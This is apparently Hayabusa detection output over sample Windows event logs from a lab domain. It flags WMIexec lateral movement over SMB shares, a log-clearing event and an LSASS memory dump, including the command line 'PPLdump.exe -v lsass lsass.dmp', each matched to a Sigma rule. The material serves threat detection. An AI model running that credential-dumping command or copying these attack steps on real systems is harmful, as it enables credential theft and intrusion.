SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe -v lsass lsass.dmp : Path: C:\Users\IEUser\Desktop\PPLdump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PPLdump.exe -v lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CreateMiniDump Hacktool,,rules/sigma/file_event/file_event_hktl_createminidump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47020 : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34114 : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.308 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.441 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator 